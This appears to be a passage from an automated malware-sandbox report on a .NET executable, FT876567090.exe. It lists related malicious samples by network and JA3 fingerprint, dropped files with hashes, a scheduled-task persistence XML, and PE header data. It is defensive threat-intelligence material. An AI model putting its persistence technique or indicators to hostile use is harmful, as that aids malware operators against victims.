TELEGRAMRU	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Get hash	malicious	VIP Keylogger	Browse	149.154.167.220
	nB52P46OJD.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	149.154.167.99
	njrtdhadawt.exe	Get hash	malicious	Stealc, Vidar	Browse	149.154.167.99
	T0x859fNfn.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	SWIFT091816-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, Vidar, Xmrig	Browse	149.154.167.99
CLOUDFLARENETUS	KASHI SHIP PARTICULARS.pdf.scr.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Get hash	malicious	VIP Keylogger	Browse	172.67.177.134
	https://eu.onamoc.comano.us/XaFJNdmNsY0JUVzZrd09aZnpEZk9LNXJHSFV1RTlrbFdPMXQ5dzRKTHV4dEdpUEhTM1I1MCszdjdWWm54V01kSEhOSlpOSFpjMUlsaFNTc0l3eXhVeWl3TGVjWm14bGMxUFkzWWFkVUQvbUlNMGEza0pnOFFCK3N4TDBlc3RyYWJkSE9xVU9ETG5TU1lHQkZwdStVdXhGMzdoQzltdFAwRnc0WTJuMmF3Q1VkTzdMb0lwNXhqOFQ3eGRtK0ZuQUpydjMxSWdnPT0tLUFPWFdqaFhtRnVKaEhNK20tLUlJNFZwQjNETFQyTk1iL0UxMUxBTGc9PQ==?cid=300477933	Get hash	malicious	KnowBe4	Browse	104.17.249.203
	ref_97024130865.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.67.152
	CITAS_pif.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	nB52P46OJD.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	54FApnc7eR.exe	Get hash	malicious	LummaC	Browse	172.67.177.250
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	PO.bat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.13.205
ORACLE-BMC-31898US	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	ref_97024130865.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.130.0
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exe	Get hash	malicious	GuLoader	Browse	158.101.44.242
	SWIFT091816-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.6.168
	REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	158.101.44.242
	arm5.elf	Get hash	malicious	Unknown	Browse	147.154.242.4
	SWIFT09181-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.130.0
	file.exe	Get hash	malicious	Amadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, Stealc	Browse	193.122.130.0
	Shipment 990847575203.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
FPT-AS-APTheCorporationforFinancingPromotingTechnolo	https://zde.soundestlink.com/ce/c/675fab7ba82aca38b8d991e6/675fabf585cd17d1e3e2bb78/675fac13057112d43b540576?signature=da009f44f7cd45aeae4fbb5addf15ac91fbf725bb5e9405183f25bf1db8c8baa	Get hash	malicious	Unknown	Browse	42.114.77.145
	sparc.elf	Get hash	malicious	Unknown	Browse	118.68.198.92
	sh4.elf	Get hash	malicious	Unknown	Browse	103.121.88.36
	https://jzd.soundestlink.com/ce/c/675b6e1bfc42b5dba74070ce/675b749b3d33226215120f3d/675b74b8f9a08fb1fbb286b7?signature=81a859d5cb272e6f3445dc5d43d3615d4aeb95f10d42be0925098a8a87224f29	Get hash	malicious	Unknown	Browse	42.114.77.145
	https://afw.soundestlink.com/ce/c/675c127e5a5226f9e7b86686/675c13ae85cd17d1e3e2ab54/675c13c9f9a08fb1fbb3e577?signature=3f4d77f7452e61cf1e0cb9ce4a3540d02af0944caf975b089573a2fc1d891103	Get hash	malicious	Unknown	Browse	42.114.77.145
	https://idw.soundestlink.com/ce/c/675b7a96903a5335b119c33f/675b7ae33d33226215120f66/675b7afd057112d43b49094d?signature=7e9e7eead1b3f32bbe3709a667795cd47f753f0f46ed5e056831680ea81aa102	Get hash	malicious	Unknown	Browse	42.114.77.145
	b3astmode.spc.elf	Get hash	malicious	Mirai	Browse	58.186.20.78
	loligang.mips.elf	Get hash	malicious	Mirai	Browse	183.80.215.200
	https://connect-velocity-33392.my.salesforce-sites.com/help	Get hash	malicious	Unknown	Browse	42.114.77.145
	MdmRznA6gx.lnk	Get hash	malicious	Ducktail	Browse	118.69.35.98

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Get hash	malicious	VIP Keylogger	Browse	104.21.67.152
	ref_97024130865.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.67.152
	CITAS_pif.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exe	Get hash	malicious	GuLoader	Browse	104.21.67.152
	SWIFT091816-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.67.152
	REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.67.152
	SWIFT09181-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.67.152
	Tvl72VM6PM.exe	Get hash	malicious	Unknown	Browse	104.21.67.152
3b5074b1b5d032e5620f69f9f700ff0e	#U00d6deme tavsiyesi.pdf.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	KASHI SHIP PARTICULARS.pdf.scr.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	#U00d6deme tavsiyesi.pdf.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Get hash	malicious	VIP Keylogger	Browse	149.154.167.220
	CITAS_pif.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	ZppxPm0ASs.exe	Get hash	malicious	Xmrig	Browse	149.154.167.220
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PO.bat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	149.154.167.220
	rQuotation.exe	Get hash	malicious	Lokibot, PureLog Stealer	Browse	149.154.167.220

Process:	C:\Users\user\AppData\Roaming\EYDNKhhJr.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FT876567090.exe.log

Download File

Process:	C:\Users\user\Desktop\FT876567090.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.379460230152629
Encrypted:	false
SSDEEP:	48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:fLHyIFKL3IZ2KRH9Oug8s
MD5:	4DC84D28CF28EAE82806A5390E5721C8
SHA1:	66B6385EB104A782AD3737F2C302DEC0231ADEA2
SHA-256:	1B89BFB0F44C267035B5BC9B2A8692FF29440C0FEE71C636B377751DAF6911C0
SHA-512:	E8F45669D27975B41401419B8438E8F6219AF4D864C46B8E19DC5ECD50BD6CA589BDEEE600A73DDB27F8A8B4FF7318000641B6A59E0A5CDD7BE0C82D969A68DE
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1chtvjwe.031.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3gdkh4is.1xv.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3rggcrht.bxx.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4xq0crbr.2dp.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_awuz24uw.qzf.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_brvor20s.1ou.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_deto2wjr.hnr.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oumrm3wq.et4.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp5055.tmp

Download File

Process:	C:\Users\user\Desktop\FT876567090.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1596
Entropy (8bit):	5.103196158679087
Encrypted:	false
SSDEEP:	24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtL7Lxvn:cge7QYrFdOFzOzN33ODOiDdKrsuTn1v
MD5:	2CC2A64F2CAB84D402363EA28B05D026
SHA1:	B1C53BDCBC51EC10205613D2BD60E5F11B0B0DB9
SHA-256:	AF4A3CAE2CE7C9FFF9FDDF61CEAF609CF43295837CB8C100F96414F06CAC8400
SHA-512:	D3CB69E56A280DD281F87BCB58F2FDAE3317C88684552B2A0DF3A2A4832601DC8D0E7C6C6055740C24A33CF4D232E63ADDCED70B732AEB503D2F403CD81E0A7E
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run

C:\Users\user\AppData\Local\Temp\tmp619B.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\EYDNKhhJr.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1596
Entropy (8bit):	5.103196158679087
Encrypted:	false
SSDEEP:	24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtL7Lxvn:cge7QYrFdOFzOzN33ODOiDdKrsuTn1v
MD5:	2CC2A64F2CAB84D402363EA28B05D026
SHA1:	B1C53BDCBC51EC10205613D2BD60E5F11B0B0DB9
SHA-256:	AF4A3CAE2CE7C9FFF9FDDF61CEAF609CF43295837CB8C100F96414F06CAC8400
SHA-512:	D3CB69E56A280DD281F87BCB58F2FDAE3317C88684552B2A0DF3A2A4832601DC8D0E7C6C6055740C24A33CF4D232E63ADDCED70B732AEB503D2F403CD81E0A7E
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run

C:\Users\user\AppData\Roaming\EYDNKhhJr.exe

Download File

Process:	C:\Users\user\Desktop\FT876567090.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	782336
Entropy (8bit):	7.671297344357169
Encrypted:	false
SSDEEP:	12288:2jlIpHtMPku+l0CPPZlhn/3EHE69r3WJ/Ggh6Yz6Co7bbJ/k5ggzBv7V:2jlIhSPd+p9/AEESd5z5o7b9XgzBZ
MD5:	773778752662F5A81D6B7A2015890B79
SHA1:	662BE6BED03EC5AFAC72029459157D7908797622
SHA-256:	86F02FD88DC04B311EC6AE30FC2E4FC8BE6884F24654A5103B7FB85F7631F99C
SHA-512:	6F3CC620230339AA6CA7F988342E463FEFFCA6C2BE0023CB96879A6FE161A9868F0F702027BE0487942C2FC2130A026F93F8EFD5F7FF9CC0CBFB18FCFF6BC598
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Zg..............0......$......R.... ........@.. .......................`............@.....................................O........!...................@....................................................... ............... ..H............text...X.... ...................... ..`.rsrc....!......."..................@..@.reloc.......@......................@..B................4.......H.......d1... .......... R...............................................0...........(........}.....s....}.....r...p(....}.....~.... ....s....}.....{....o.... ......o......{.....o......{....o.....{....o......{.....{....o.....f........s....s....(.....~..{....r...po......{....o......0..}.........{....r9..po......+7...{.....\|....o ...}....(!....{....o".....{.....o........+.&..{....rS..po........&..{....rS..po...................>P..........>f.........}.....(#.......s....}....

C:\Users\user\AppData\Roaming\EYDNKhhJr.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\FT876567090.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.671297344357169
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	FT876567090.exe
File size:	782'336 bytes
MD5:	773778752662f5a81d6b7a2015890b79
SHA1:	662be6bed03ec5afac72029459157d7908797622
SHA256:	86f02fd88dc04b311ec6ae30fc2e4fc8be6884f24654a5103b7fb85f7631f99c
SHA512:	6f3cc620230339aa6ca7f988342e463feffca6c2be0023cb96879a6fe161a9868f0f702027be0487942c2fc2130a026f93f8efd5f7ff9cc0cbfb18fcff6bc598
SSDEEP:	12288:2jlIpHtMPku+l0CPPZlhn/3EHE69r3WJ/Ggh6Yz6Co7bbJ/k5ggzBv7V:2jlIhSPd+p9/AEESd5z5o7b9XgzBZ
TLSH:	16F4CFC03B26B701DEAC7934853AEDBC52682E78700479F36EED2B5776D9112AA1CF44
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Zg..............0......$......R.... ........@.. .......................`............@................................

File Icon


Icon Hash:	37c38329a3924d33

Static PE Info

General

Entrypoint:	0x4be952
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x675AB1C4 [Thu Dec 12 09:49:56 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
